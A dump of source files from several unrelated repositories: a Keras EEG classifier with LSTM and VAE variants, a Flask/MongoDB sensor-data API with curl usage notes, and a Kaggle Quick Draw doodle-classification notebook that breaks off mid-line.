make_lstm_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n #policy = mixed_precision.Policy('mixed_float16')\n #mixed_precision.set_policy(policy)\n x_train = x_train.transpose((0, 2, 1))[:, :, :, None]\n x_test = x_test.transpose((0, 2, 1))[:, :, :, None]\n y_train -= 769\n y_test -= 769\n\n model = keras.models.Sequential()\n\n conv1 = layers.Conv2D(30, kernel_size=(10, 1), strides=1,\n kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(30, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.MaxPool2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n model.add(layers.Reshape((330, 30)))\n\n model.add(layers.LSTM(20, return_sequences=True,\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.BatchNormalization())\n drop1 = layers.Dropout(dropout)\n model.add(drop1)\n\n model.add(layers.LSTM(20, return_sequences=True,\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.BatchNormalization())\n drop1 = layers.Dropout(dropout)\n model.add(drop1)\n\n model.add(layers.Reshape((330, 20, 1)))\n conv5 = layers.Conv2D(60, kernel_size=(\n 10, 1), kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.MaxPool2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n dense2 = layers.Dense(128, name='dense_2')\n model.add(layers.TimeDistributed(dense2))\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n drop2 = layers.Dropout(dropout)\n model.add(drop2)\n model.add(layers.Flatten())\n model.add(layers.Dense(4, name='dense_logits',\n kernel_regularizer=regularizers.l2(reg)))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(x_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2)\n test_scores = model.evaluate(x_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n plot(history)\n\n return model\n\n\ndef nll(y_true, y_pred):\n \"\"\" Negative log likelihood (Bernoulli). \"\"\"\n\n # keras.losses.binary_crossentropy gives the mean\n # over the last axis. we require the sum\n return K.sum(keras.losses.mean_squared_error(y_true, y_pred))\n\nclass KLDivergenceLayer(klayers.Layer):\n\n \"\"\" Identity transform layer that adds KL divergence\n to the final model loss.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.is_placeholder = True\n super(KLDivergenceLayer, self).__init__(*args, **kwargs)\n\n def call(self, inputs):\n\n mu, log_var = inputs\n\n kl_batch = - .5 * K.sum(1 + log_var -\n K.square(mu) -\n K.exp(log_var), axis=-1)\n\n self.add_loss(K.mean(kl_batch), inputs=inputs)\n\n return inputs\n\n\ndef make_vae_model(x_train, y_train, x_test, y_test, reg=0.001, alpha=.7, learning_rate=0.001, dropout=0.5, epochs=100, relative_size=1.0, optim='SGD'):\n y_train -= 769\n y_test -= 769\n\n # latent_dim should be much smaller, but right now its equal to the original cnn input size\n latent_dim = 500 * 22 # 2\n original_dim = 22000\n intermediate_dim = 512\n batch_size = 100\n \n epsilon_std = 1.0\n\n x_train = x_train.reshape(-1, original_dim)\n train_mean = np.mean(x_train)\n train_std = np.std(x_train)\n norm_x_train = (x_train -train_mean ) / train_std\n\n x_test = x_test.reshape(-1, original_dim)\n test_mean = np.mean(x_test)\n test_std = np.std(x_test)\n norm_x_test = (x_test - test_mean ) / test_std\n\n decoder = kmodels.Sequential([\n klayers.Dense(intermediate_dim, input_dim=latent_dim,\n activation='relu', kernel_regularizer=regularizers.l2(reg)),\n klayers.Dense(original_dim, activation='sigmoid', kernel_regularizer=regularizers.l2(reg))\n ])\n\n x = klayers.Input(shape=(original_dim,))\n h = klayers.Dense(intermediate_dim, activation='relu', kernel_regularizer=regularizers.l2(reg))(x)\n\n z_mu = klayers.Dense(latent_dim, kernel_regularizer=regularizers.l2(reg))(h)\n z_log_var = klayers.Dense(latent_dim, kernel_regularizer=regularizers.l2(reg))(h)\n\n z_mu, z_log_var = KLDivergenceLayer()([z_mu, z_log_var])\n z_sigma = klayers.Lambda(lambda t: K.exp(.5 * t))(z_log_var)\n\n eps = klayers.Input(tensor=K.random_normal(stddev=epsilon_std,\n shape=(K.shape(x)[0], latent_dim)))\n z_eps = klayers.Multiply()([z_sigma, eps])\n z = klayers.Add()([z_mu, z_eps])\n\n x_pred = decoder(z)\n vae = kmodels.Model(inputs=[x, eps], outputs=x_pred)\n vae.compile(optimizer='rmsprop', loss=nll)\n\n history = vae.fit(norm_x_train,\n norm_x_train,\n shuffle=True,\n epochs=epochs,\n batch_size=batch_size,\n validation_split=.2)\n\n encoder = kmodels.Model(x, z_mu)\n z_train = encoder.predict(norm_x_train, batch_size=batch_size)\n z_test = encoder.predict(norm_x_test, batch_size=batch_size)\n\n z_train = z_train.reshape(-1, 22, 500, 1).transpose(0, 2, 1, 3)\n z_test = z_test.reshape(-1, 22, 500, 1).transpose(0, 2, 1, 3)\n # now pass encoded input into cnn\n\n size = int(25 * relative_size)\n conv1 = layers.Conv2D(size, kernel_size=(\n 10, 1), strides=1, kernel_regularizer=regularizers.l2(reg))\n conv2 = layers.Conv2D(size, kernel_size=(\n 1, 22), kernel_regularizer=regularizers.l2(reg))\n perm1 = layers.Permute((1, 3, 2))\n pool1 = layers.AveragePooling2D(pool_size=(3, 1))\n drop1 = layers.Dropout(dropout)\n\n model = keras.models.Sequential()\n\n model.add(conv1)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(conv2)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm1)\n model.add(pool1)\n model.add(drop1)\n\n conv3 = layers.Conv2D(2*size, kernel_size=(10, size),\n kernel_regularizer=regularizers.l2(reg))\n model.add(layers.ELU(alpha))\n perm2 = layers.Permute((1, 3, 2))\n pool2 = layers.AveragePooling2D(pool_size=(3, 1))\n drop2 = layers.Dropout(dropout)\n\n model.add(conv3)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm2)\n model.add(pool2)\n model.add(drop2)\n\n conv4 = layers.Conv2D(4*size, kernel_size=(10, 2*size),\n kernel_regularizer=regularizers.l2(reg))\n perm3 = layers.Permute((1, 3, 2))\n pool3 = layers.AveragePooling2D(pool_size=(3, 1))\n drop3 = layers.Dropout(dropout)\n\n model.add(conv4)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm3)\n model.add(pool3)\n model.add(drop3)\n\n conv5 = layers.Conv2D(8*size, kernel_size=(10, 4*size),\n kernel_regularizer=regularizers.l2(reg))\n perm4 = layers.Permute((1, 3, 2))\n pool4 = layers.AveragePooling2D(pool_size=(3, 1))\n drop4 = layers.Dropout(dropout)\n\n model.add(conv5)\n model.add(layers.ELU(alpha))\n model.add(layers.BatchNormalization())\n model.add(perm4)\n model.add(pool4)\n model.add(drop4)\n\n model.add(layers.Flatten())\n\n model.add(layers.Dense(4, name='dense_logits'))\n model.add(layers.Activation('softmax', dtype='float32', name='predictions'))\n\n if optim == 'Adam':\n optimizer = keras.optimizers.Adam(\n learning_rate, beta_1=0.85, beta_2=0.92, amsgrad=True)\n elif optim == 'RMSprop':\n optimizer = keras.optimizers.RMSprop(learning_rate)\n else:\n optimizer = keras.optimizers.SGD(learning_rate, nesterov=True)\n\n model.compile(loss='sparse_categorical_crossentropy',\n optimizer=optimizer,\n metrics=['accuracy'])\n history = model.fit(z_train, y_train,\n batch_size=20,\n epochs=epochs,\n validation_split=0.2,\n verbose=1)\n test_scores = model.evaluate(z_test, y_test, verbose=2)\n print('Test loss:', test_scores[0])\n print('Test accuracy:', test_scores[1])\n\n plot(history)\n\n return model\n\n\nif __name__ == \"__main__\":\n init()\n x_test, y_test, _, x_train, y_train, _ = load.load_data()\n #make_cnn_model(x_train, y_train, x_test, y_test, reg=0.005, dropout=0.6, learning_rate=0.00075, alpha=0.8, epochs=100)\n # make_lstm_model(x_train, y_train, x_test, y_test,\n # reg=0.002, dropout=0.45, alpha=.8)\n make_vae_model(x_train, y_train, x_test, y_test)\n"
},
{
"alpha_fraction": 0.7066666483879089,
"alphanum_fraction": 0.7599999904632568,
"avg_line_length": 24,
"blob_id": "d0ff9d07a5fccfb1d58e26e05f03287060440d52",
"content_id": "69282e7b4dbfd51b82c441469672bc9f899dbef9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 3,
"path": "/README.md",
"repo_name": "aldenperrine/ece_247",
"src_encoding": "UTF-8",
"text": "# ece_247\n\nUse `pip3 install -r requirements.txt` to install dependencies.\n"
}
] | 3 |
rgarb16/smartalertcloud
|
https://github.com/rgarb16/smartalertcloud
|
86bd3eaf8352c9b294fff076a2393ee7411054bb
|
d0533d5cb2bc4c73d2c922e6bcdf534b7dd72387
|
c6fcc5dd3442d4894a78ffbbf5fae5035afe60be
|
refs/heads/master
| 2022-01-13T10:28:02.445974 | 2019-05-19T17:49:15 | 2019-05-19T17:49:15 | 182,945,620 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.46858638525009155,
"alphanum_fraction": 0.6910994648933411,
"avg_line_length": 14.916666984558105,
"blob_id": "2909a9d47106c9d57848839ceb347018aa0ed33b",
"content_id": "10ae1d5be1af331ba08bed3e582f5371a491a328",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 382,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 24,
"path": "/iot_server_app/requirements.txt",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "aniso8601==6.0.0\nAST==0.0.2\nBabel==0.9.6\nboto3==1.9.134\nbotocore==1.12.134\ncloud-init==18.2\ndecorator==3.4.0\nFlask==1.0.2\nFlask-RESTful==0.3.7\nIPy==0.75\nJinja2==2.10.1\njsonpatch==1.2\njsonpointer==1.9\nlxml==3.2.1\nMagic-file-extensions==0.2\nMarkupSafe==1.1.1\nperf==0.1\nprettytable==0.7.2\npycurl==7.19.0\npymongo==3.7.2\npyxattr==0.5.1\ns3transfer==0.2.0\nurllib3==1.24.2\nWerkzeug==0.15.2\n"
},
{
"alpha_fraction": 0.5664263367652893,
"alphanum_fraction": 0.5822176337242126,
"avg_line_length": 24.552631378173828,
"blob_id": "d370ef138fb322cf51f5465f083a683ff2c0ccc7",
"content_id": "9094c15463444cbc610ec3913bc405c72575f333",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2913,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 114,
"path": "/iot_server_app/app/sensorData.py",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "\"\"\"This module will serve the api request.\"\"\"\n\nfrom config import client\nfrom app import app\nfrom bson.json_util import dumps\nfrom flask import request, jsonify\nimport json\nimport ast\nimport imp\nimport calendar\nimport datetime\nfrom bson.objectid import ObjectId\n\"\"\"\n 04/24/2019 \n - Added functionality to generate report\n\"\"\"\n\n# Import the helpers module\nhelper_module = imp.load_source('*', './app/helpers.py')\n\n# Select the database\ndb = client.sensordb\n# Select the collection\ncollection = db.sensor\n\[email protected](\"/\")\ndef get_initial_response():\n message = {\n 'apiVersion': 'v1.0',\n 'status': '200',\n 'message': 'Welcome to the Sensor Data API'\n }\n resp = jsonify(message)\n return resp\n\n\[email protected](\"/api/v1/sensor\", methods=['POST'])\ndef create_sensor():\n \"\"\"\n Function to Add sensor data \n \"\"\"\n try:\n # Add sensor \n try:\n body = ast.literal_eval(json.dumps(request.get_json()))\n except:\n return \"\", 400\n\n record_created = collection.insert(body)\n\n if isinstance(record_created, list):\n return jsonify([str(v) for v in record_created]), 201\n else:\n return jsonify(str(record_created)), 201\n except:\n return \"\", 500\n\n\[email protected](\"/api/v1/sensor\", methods=['GET'])\ndef get_sensor_data():\n \"\"\"\n Function to get sensors data.\n \"\"\"\n try:\n query_params = helper_module.parse_query_params(request.query_string)\n # Check if dictionary is not empty\n if query_params:\n\n query = {k: int(v) if isinstance(v, str) and v.isdigit() else v for k, v in query_params.items()}\n\n records_fetched = collection.find(query)\n\n if records_fetched.count() > 0:\n return dumps(records_fetched)\n else:\n return \"\", 404\n\n # If dictionary is empty\n else:\n if collection.find().count > 0:\n return dumps(collection.find())\n else:\n return jsonify([])\n except:\n return \"\", 500\n\n#Generate reports\[email protected](\"/api/v1/sensor/report/<int:hours>\", methods=['GET'])\ndef get_report_data(hours):\n try:\n if collection.find().count > 0:\n gen_time = datetime.datetime.today() - datetime.timedelta(hours=hours) \n records = ObjectId.from_datetime(gen_time)\n result = list(db.coll.find({\"_id\": {\"$gte\": records}}))\n\n return dumps(collection.find({\"_id\": {\"$gte\": records}}))\n else:\n return jsonify([])\n except Exception as e:\n print e.message, e.args\n return \"\", 500\n\n\[email protected](404)\ndef page_not_found(e):\n message = {\n \"err\":\n {\n \"msg\": \"This route is currently not supported. Please refer API documentation.\"\n }\n }\n resp = jsonify(message)\n resp.status_code = 404\n return resp\n"
},
{
"alpha_fraction": 0.6497326493263245,
"alphanum_fraction": 0.7433155179023743,
"avg_line_length": 40.55555725097656,
"blob_id": "7fd7fc3d13a78df6b84712cb4841a5ab49e11096",
"content_id": "1a822b61fdc3c8677d0b8676d9cabde9aad3533c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 9,
"path": "/iot_server_app/config.py",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "\"\"\"This module is to configure app to connect with database.\"\"\"\n\nfrom pymongo import MongoClient\nimport urllib\n\nDATABASE = MongoClient()['sensordb'] # DB_NAME\nDEBUG = True\nuri = \"mongodb://sensor_user1:\"+urllib.quote(\"xxx\")+\"@mongo1:27017,mongo2:27017/?replicaSet=myreplica01\"\nclient = MongoClient(['mongo1:27017', 'mongo2:27017', 'mongo3:27017'], replicaSet='myreplica01')\n"
},
{
"alpha_fraction": 0.5935935974121094,
"alphanum_fraction": 0.6796796917915344,
"avg_line_length": 46.380950927734375,
"blob_id": "a943e5d316c0c8d0e8021e08732908c798725e8b",
"content_id": "f0416de2b2cc7292647247ac691c8a5234994236",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1001,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 21,
"path": "/README.md",
"repo_name": "rgarb16/smartalertcloud",
"src_encoding": "UTF-8",
"text": "# smartcity\n\ncurl -X POST http://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor -H 'Content-Type: application/json' -d '{ \n \"sensor_id\": 81, \n \"recorded_time\": \"03:21:02.381230\", \n \"recorded_date\": \"2019-04-24” \n \"battery_health\": \"ok\", \n \"sensor_type\": \"humidity\", \n \"humidity_range\": 11, \n \"humidity_alarm_state\": \"warning\", \n \"geo_tag_location\": 95014 \n}' \n\nTo Get the data ,i.e querying through sensor_type=humidity \ncurl -k https://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor?sensor_type=humidity \nTo Get the data ,i.e querying through sensor_type=smoke \ncurl -k https://mysensor-db-906737534.us-east-2.elb.amazonaws.com/api/v1/sensor?sensor_type=smoke \nTo Get the data ,i.e querying all sensors \ncurl -k https://mysensor-db-906737534.us-b.amazonaws.com/api/v1/sensor | jq .\nTo grab the reports for lass 24 hrs \ncurl -k https://mysensor-db-906737534.us-b.amazonaws.com/api/v1/sensor/reports/24 | jq . \n\n"
}
] | 4 |
jominjimail/kaggle_first
|
https://github.com/jominjimail/kaggle_first
|
b91cb10bbb358a16b4068c3c760ea3c4ad5fc614
|
728330e8fba8a35d0b5699e06c3f8d8b6853260c
|
cb9677c977e6b7cd7fda2b2661d186d975b0a48d
|
refs/heads/master
| 2020-05-22T21:33:50.834654 | 2019-05-23T05:37:35 | 2019-05-23T05:37:35 | 186,529,262 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7596153616905212,
"alphanum_fraction": 0.7596153616905212,
"avg_line_length": 25,
"blob_id": "677c3ad142e5b85ec447e28e2e85cfb3ba6f7cc1",
"content_id": "81be61b3156fac03374afd062862e5574c6503bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 104,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 4,
"path": "/README.md",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "# kaggle\n\n### Quick, Draw! Doodle Recognition Challenge\nhttps://www.kaggle.com/rookiebox/quick-draw-cnn\n"
},
{
"alpha_fraction": 0.6145612001419067,
"alphanum_fraction": 0.6320111155509949,
"avg_line_length": 24.110496520996094,
"blob_id": "5f1953e35a539117dafb609ba6ecad05bc170772",
"content_id": "2258a4e273d7aea6ab0ac2cb805f95d357760355",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13652,
"license_type": "no_license",
"max_line_length": 343,
"num_lines": 543,
"path": "/the-easiest-code-for-catching-doodle.py",
"repo_name": "jominjimail/kaggle_first",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# # **Quick Draw: Catch Doodle!**\n\n# “Quick, Draw!” is a game created by Google. It's a game where one player is prompted to draw a picture of an object, and the other player needs to guess what it is. More details can be found [this post](https://towardsdatascience.com/quick-draw-the-worlds-largest-doodle-dataset-823c22ffce6b). \n# \n# This project is for building an image classifier model that can handle noisy and sometimes incomplete drawings and perform well on classifying 50 different animals.\n\n# Table of contents:\n# - [1. Load data](# 1. Load data)\n# - [2. Let's draw doodle](# 2. Let's draw doodle)\n# - [3. From strokes to Image](# 3. From strokes to Image)\n# - [4. Let's call all friends here!](# 4. Let's call all friends here!)\n# - [5. Modeling- CNN](# 5. Modeling- CNN)\n# - [6. Plot the result](# 6. Plot the result)\n# - [7. Modeling with ResNet50](# 7. Modeling with ResNet50)\n\n# In[ ]:\n\n\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(style='white', context='notebook')\n\nnp.random.seed(36)\n\n\n# In[ ]:\n\n\nimport ast\nimport cv2\nimport dask.bag as db\n\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, MaxPool2D, Flatten, Dense, Dropout\nfrom keras.callbacks import EarlyStopping, ReduceLROnPlateau \n\nfrom keras.applications.resnet50 import ResNet50\nfrom tensorflow.keras.applications.vgg19 import VGG19\n\n\n# # 1. Load data <a></a>\n\n# I'm going to use only the train_simplified.zip file for training. And we will use only the animal drawings among them. Cause...they are soooo cute :-) To load all 50 animals files automatically, I'll make a list for filenames. \n\n# In[ ]:\n\n\n# list of animals \nanimals = ['ant', 'bat', 'bear', 'bee', 'bird', 'butterfly', 'camel', 'cat', 'cow',\n 'crab', 'crocodile', 'dog', 'dolphin', 'dragon', 'duck', 'elephant', 'fish',\n 'flamingo', 'frog', 'giraffe', 'hedgehog', 'horse', 'kangaroo', 'lion',\n 'lobster', 'monkey', 'mosquito', 'mouse', 'octopus', 'owl', 'panda',\n 'parrot', 'penguin', 'pig', 'rabbit', 'raccoon', 'rhinoceros', 'scorpion',\n 'sea turtle', 'shark', 'sheep', 'snail', 'snake', 'spider', 'squirrel',\n 'swan', 'teddy-bear', 'tiger', 'whale', 'zebra']\n\n\n# Before uploading all the files at once, let's take a test with .csv first.\n\n# In[ ]:\n\n\ndir_path = '../input/train_simplified/'\ndf = pd.read_csv(dir_path + animals[0] + '.csv')\ndf.head()\n\n\n# `drawing` is the stroke values, which is telling the drawing of animals. We need to exchage this data into image data later. `word` indicates the result of drawings or animals. `recognized` means whether the drawing was understood as a certain object or not. Let's take only the 10 rows per animals and filter the unrecogizable drawing out. \n\n# In[ ]:\n\n\nam = pd.DataFrame(columns = df.columns)\n\nfor i in range(len(animals)):\n filename = dir_path + animals[i] + '.csv'\n df = pd.read_csv(filename, nrows = 100)\n df = df[df.recognized == True]\n am = am.append(df)\n\n\n# In[ ]:\n\n\n# Check\nam.word.nunique()\n\n\n# # 2. Let's draw doodle <a></a>\n\n# Before data proprocessing and modeling, let's see how people drew animals. The image information can be found at `drawing` but in order to make it visual, we need some steps of processing. Let's take only 100 data for an example.\n\n# In[ ]:\n\n\n# Sampling only 100 examples\nex = am.sample(100)\nex.head()\n\n\n# In[ ]:\n\n\nex.drawing.head(1).values # -> strings\n\n\n# Take a note at the front of the result. \n# <br>\n# array(**[ ' [[ 34, 41 ... ]]]) **\n# <br>\n# This indicates this data is strings, not list.\n\n# In[ ]:\n\n\nex.drawing.head(1).map(ast.literal_eval).values # -> list\n\n\n# We can see that the dypes changed. Now we are able to use it for plotting the strokes. Let's convert the other data as well.\n\n# In[ ]:\n\n\n# Convert to list\nex['drawing'] = ex.drawing.map(ast.literal_eval)\n\n\n# Now we are going to meet our lovely cats, dogs and pandas. Take a look at the code below.\n\n# In[ ]:\n\n\n# Plot the strokes \n# fig, axs = plt.subplots(nrows = 10, ncols = 10, figsize = (10, 8))\n\n# for index, col in enumerate(ex.drawing):\n# ax = axs[index//10, index%10]\n# for x, y in col:\n# ax.plot(x,-np.array(y), lw = 3)\n# ax.axis('off')\n \n# plt.show()\n\n\n# The concept of visualization can be seen complex at the first sight but it's not true. First we will get 100 grids and put the drawing in the grids one by one. `enumerate()` will return the index and column values. Let's take one example to understand step by step. \n\n# In[ ]:\n\n\n# Understanding enumerate\nfor index, col in enumerate(ex.drawing[:12]):\n print('The index is ', index)\n print('Position will be ({}, {})'.format(index//10, index%10))\n print('The strokes are ', col)\n print('===========')\n\n\n# As you can see above `enumerate()` brings us the index and the values one by one. So we are going to plot the values at the given values by col. \n\n# In[ ]:\n\n\nfor index, col in enumerate(ex.drawing[:2]):\n print('==================================')\n for x, y in col:\n print('X is {}'.format(x))\n print('Y is {}'.format(y))\n print('-----------------------')\n\n\n# So what we are going to do is ploting these x, y values just like what we've been doing with graphs. Now let's apply all this into one shot and finally meet our lovely friends.\n\n# In[ ]:\n\n\n# Plot the strokes \nfig, axs = plt.subplots(nrows = 10, ncols = 10, figsize = (10, 8))\n\nfor index, col in enumerate(ex.drawing):\n ax = axs[index//10, index%10]\n for x, y in col:\n ax.plot(x,-np.array(y), lw = 3)\n ax.axis('off')\n \nplt.show()\n\n\n# OMG 🙉🙈😍.....This is so funny.\n\n# # 3. From strokes to Image <a></a>\n\n# Now the next step is transforming all these drawings into image data. Like I said above, the data isn't in the form of image data. We have to covert it into numpy array format. I'm going to make a function for this. \n\n# In[ ]:\n\n\nim_size = 64\nn_class = len(animals)\n\n\n# In[ ]:\n\n\n# define a function converting drawing to image data\ndef draw_to_img(strokes, im_size = im_size):\n\n fig, ax = plt.subplots() # plot the drawing as we did above\n for x, y in strokes:\n ax.plot(x, -np.array(y), lw = 10)\n ax.axis('off')\n \n fig.canvas.draw() # update a figure that has been altered\n A = np.array(fig.canvas.renderer._renderer) # converting them into array\n \n plt.close('all')\n plt.clf()\n \n A = (cv2.resize(A, (im_size, im_size)) / 255.) # image resizing to uniform format\n \n return A\n\n\n# All the things we discussed at the second section are put inside the `draw_to_img()` function. Let's try it with an example.\n\n# In[ ]:\n\n\nX = ex.drawing.values\nimage = draw_to_img(X[1])\nplt.imshow(image)\n\n\n# In[ ]:\n\n\nimage.shape\n\n\n# The image has 4 channels and we can also check each channels separately.\n\n# In[ ]:\n\n\n# Channel selection \nfig, axs = plt.subplots(nrows = 1, ncols = 4, figsize = (10, 10))\n\nfor i in range(4):\n ax = axs[i]\n ax.imshow(image[:, :, i])\n\n\n# We will make the input image shape as `(im_size, im_size, 3)`, which means it has only one channels. Therefore we''ll take only the last channel here.\n\n# In[ ]:\n\n\n# redefine\ndef draw_to_img(strokes, im_size = im_size):\n fig, ax = plt.subplots() # plot the drawing as we did above\n for x, y in strokes:\n ax.plot(x, -np.array(y), lw = 10)\n ax.axis('off')\n \n fig.canvas.draw() # update a figure that has been altered\n A = np.array(fig.canvas.renderer._renderer) # converting them into array\n \n plt.close('all')\n plt.clf()\n \n A = (cv2.resize(A, (im_size, im_size)) / 255.) # image resizing to uniform format\n\n return A[:, :, :3] # drop the last one \n\n\n# In[ ]:\n\n\nimage = draw_to_img(X[1])\nplt.imshow(image)\nprint(image.shape)\n\n\n# # 4. Let's call all friends here! <a></a>\n\n# Now we are ready to apply what we've been doing so far into the entire dataset.\n\n# In[ ]:\n\n\nn_samples = 500\nX_train = np.zeros((1, im_size, im_size, 3))\ny = []\n\nfor a in animals:\n print(a)\n filename = dir_path + a + '.csv'\n df = pd.read_csv(filename, usecols=['drawing', 'word'], nrows=n_samples) # import the data in chunks\n df['drawing'] = df.drawing.map(ast.literal_eval) # convert strings into list\n X = df.drawing.values\n \n img_bag = db.from_sequence(X).map(draw_to_img) # covert strokes into array\n X = np.array(img_bag.compute()) \n X_train = np.vstack((X_train, X)) # concatenate to get X_train \n \n y.append(df.word)\n\n\n# As I just stack the array, the dimension of `X_train` has one more values than it's expected. Therefore we'll drop the first layer. \n\n# In[ ]:\n\n\n# The dimension of X_train\nX_train.shape\n\n\n# In[ ]:\n\n\n# Drop the first layer\nX_train = X_train[1:, :, :, :]\nX_train.shape\n\n\n# Don't forget to encoding the categorical data before modeling fitting\n\n# In[ ]:\n\n\n# Encoding \ny = pd.DataFrame(y)\ny = pd.get_dummies(y)\ny_train = np.array(y).transpose()\n\n\n# In[ ]:\n\n\n# Check the result\nprint(\"The input shape is {}\".format(X_train.shape))\nprint(\"The output shape is {}\".format(y_train.shape))\n\n\n# Now let's combine the X_train and y_train again. This is for splitting the data into the trainning set and validation set. \n\n# In[ ]:\n\n\n# Reshape X_train\nX_train_2 = X_train.reshape((X_train.shape[0], im_size*im_size*3))\n\n# Concatenate X_train and y_train\nX_y_train = np.hstack((X_train_2, y_train))\n\n\n# \n\n# In[ ]:\n\n\n# Random shuffle\nnp.random.shuffle(X_y_train)\na = im_size*im_size*3\ncut = int(len(X_y_train) * .1)\nX_val = X_y_train[:cut, :a]\ny_val = X_y_train[:cut, a:]\nX_train = X_y_train[cut:, :a]\ny_train = X_y_train[cut:, a:]\n\n# Reshape X_train back to (64, 64)\nX_train = X_train.reshape((X_train.shape[0], im_size, im_size, 3))\nX_val = X_val.reshape((X_val.shape[0], im_size, im_size, 3))\n\n\n# Check the final shape of train and validation set.\n\n# In[ ]:\n\n\n# Check the result\nprint(\"The input shape of train set is {}\".format(X_train.shape))\nprint(\"The input shape of validation set is {}\".format(X_val.shape))\nprint(\"The output shape of train set is {}\".format(y_train.shape))\nprint(\"The output shape of validation set is {}\".format(y_val.shape))\n\n\n# # 5. Modeling- CNN <a></a>\n\n# I'm going to start with the basic CNN model as a baseline. And then compare the results with ResNet and VGG19\n\n# In[ ]:\n\n\nn_epochs = 10\nbatch_size = 500\n\n# Initialize\nmodel = Sequential()\n\n# ConvNet_1\nmodel.add(Conv2D(32, kernel_size = 3, input_shape = (im_size, im_size, 3), padding = 'same', activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# ConvNet_2\nmodel.add(Conv2D(64, kernel_size = 3, activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# ConvNet_3\nmodel.add(Conv2D(64, kernel_size = 3, activation = 'relu'))\nmodel.add(MaxPool2D(2, strides = 2))\n# Dropout\nmodel.add(Dropout(.2))\n\n# Flattening\nmodel.add(Flatten())\n\n# Fully connected\nmodel.add(Dense(680, activation = 'relu'))\n\n# Dropout\nmodel.add(Dropout(.5))\n\n# Final layer\nmodel.add(Dense(n_class, activation = 'softmax'))\n\n# Compile\nmodel.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n\n\n# In[ ]:\n\n\nmodel.summary()\n\n\n# I'll also add callbacks not to get overfitting. \n\n# In[ ]:\n\n\n# Early stopper\nstopper = EarlyStopping(monitor='val_top_3_accuracy', mode='max', patience = 3)\n\n# Learning rate reducer\nreducer = ReduceLROnPlateau(monitor = 'val_acc',\n patience = 3,\n verbose = 1,\n factor = .5,\n min_lr = 0.00001)\n\ncallbacks = [stopper, reducer]\n\n\n# In[ ]:\n\n\n# Fitting baseline\nhistory = model.fit(X_train, y_train, epochs = n_epochs, batch_size = batch_size, \n validation_split = .2, verbose = True)\n\n\n# # 6. Plot the result <a></a>\n\n# Let's see how well our model is trained.\n\n# In[ ]:\n\n\n# Train and validation curves\nfig, (ax1, ax2) = plt.subplots(2, 1)\nax1.plot(history.history['loss'], color = 'b', label = 'Train Loss')\nax1.plot(history.history['val_loss'], color = 'm', label = 